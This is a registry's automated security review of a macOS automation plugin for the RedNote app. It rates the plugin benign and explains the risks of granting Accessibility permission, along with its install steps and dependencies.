Skillv1.3.7

ClawScan security

Rednote Mac · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

BenignMar 1, 2026, 6:22 AM

Verdict: benign
Confidence: high
Model: gpt-5-mini
Summary: The skill's code, docs, and runtime instructions align with its stated purpose (driving the RedNote macOS app via the Accessibility API); it requires macOS Accessibility permission (a high‑privilege requirement) but otherwise requests no unrelated credentials or network access.
Guidance: This skill appears coherent: the files implement Accessibility-driven automation for the RedNote macOS app and the install steps match that goal. Before installing: (1) understand that granting Terminal Accessibility permission lets scripts control every app on your Mac — only enable it if you trust the code and ideally test in a separate/local user account or VM; (2) review install.sh and the Python files yourself (they use pbcopy, screencapture, osascript, cliclick and run local subprocesses — expected for GUI automation); (3) ensure you only enable the plugin when RedNote is a legitimate app you have installed; (4) if you plan to run the MCP server mode, be careful about how mcp is configured (it can expose different transports depending on runtime configuration). If you want more assurance, run the plugin in an isolated account/session and inspect/modify the code to remove any behaviors you don't want.

Review Dimensions

Purpose & Capability: okName/description indicate native macOS app automation for RedNote. The code (xhs_controller.py, server.py, index.ts), README, and SKILL.md all implement Accessibility-driven UI control, use cliclick and Python AX libraries, and register tools matching the documented capabilities. Required binaries (cliclick, python3) and the Accessibility permission are appropriate for this purpose. Minor implementation oddity: the Python code uses OWNER_NAME='rednote' and PROCESS_NAME='discover' (pgrep -x 'discover') which looks like a bug/ mismatch but not a sign of unrelated functionality.
Instruction Scope: okSKILL.md and README instruct only local actions: install dependencies, grant Terminal Accessibility permission, run install.sh, and invoke tools that take screenshots, click, type, and read AX attributes. No instructions request unrelated files, environment variables, or external endpoints. The documentation is explicit about limitations and the need to keep the app visible. It also warns that Accessibility permission grants control over all apps (correct and important).
Install Mechanism: okThere is no opaque remote download. install.sh uses Homebrew and pip (or uv sync) to install known packages (cliclick via Homebrew; atomacos, PyObjC, mcp via PyPI). It creates a symlink in ~/.openclaw/extensions to register the plugin. This is standard and proportionate for the skill's functionality.
Credentials: okThe skill declares no required environment variables or credentials. Code does not embed secrets or request tokens. The only privileged resource required is macOS Accessibility permission, which is necessary for automating GUI actions but is inherently high‑risk — the README and SKILL.md call this out.
Persistence & Privilege: noteThe skill is not always: true and does not request to modify other skills. It creates a symlink under ~/.openclaw/extensions to register itself (normal for a plugin). The significant privilege to note is the macOS Accessibility permission (granted to Terminal) because that allows automated control of any GUI application; the skill legitimately needs it for its purpose, but this amplifies its potential impact if misused. The README suggests running automation in a dedicated user account, which is good guidance.